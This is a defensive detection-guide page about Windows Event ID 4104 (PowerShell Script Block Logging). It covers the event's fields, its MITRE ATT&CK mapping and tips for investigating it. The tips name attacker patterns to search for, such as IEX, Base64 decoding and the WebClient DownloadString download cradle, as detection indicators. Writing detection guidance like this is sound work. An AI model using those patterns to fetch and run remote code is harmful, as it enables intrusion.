EventPeeker
Scan your Security and Sysmon logs·Detection guides
Event ID 4104WarningMicrosoft-Windows-PowerShell/OperationalT1059.001

Windows Event ID 4104PowerShell Script Block Logging

Logged when PowerShell executes a script block — captures the actual code being run, even if it was de-obfuscated at runtime. One of the most valuable PowerShell forensic data sources.

MITRE ATT&CK

Technique

T1059.001 · PowerShell

Tactic

Execution

View on attack.mitre.org →

Why It Matters

Attackers heavily obfuscate PowerShell to evade detection. Script Block Logging captures the de-obfuscated code after PowerShell processes it, exposing encoded payloads, in-memory attacks, and download cradles.

Key Fields

Script Block TextThe actual PowerShell code — look for IEX (Invoke-Expression), DownloadString, encoded commands, and known offensive tool signatures
Script Block IDLinks multi-part script blocks together
PathFile path if a script file was used; empty for memory-only execution

Investigation Tips

  1. 1.Search for IEX, Invoke-Expression, [System.Convert]::FromBase64String — common obfuscation techniques.
  2. 2.Look for download cradles: (New-Object Net.WebClient).DownloadString or Invoke-WebRequest.
  3. 3.Enable via GPO: Computer Configuration → Administrative Templates → Windows Components → Windows PowerShell → Turn on Script Block Logging.

Related Event IDs

4103PowerShell module logging — less detailed but complementary
4688Process creation for the PowerShell process

Full Detection Guide Available

This event ID has a full detection guide with investigation steps, remediation advice, and example log entries.

View full guide for Event ID 4104

See Event ID 4104 in your logs

Upload a Windows Event Log (.evtx) file — EventPeeker automatically detects powershell script block logging patterns, maps findings to MITRE ATT&CK, and generates an AI triage report.

Analyze EVTX Logs Free →
← All detection guides·Analyze EVTX Logs Free →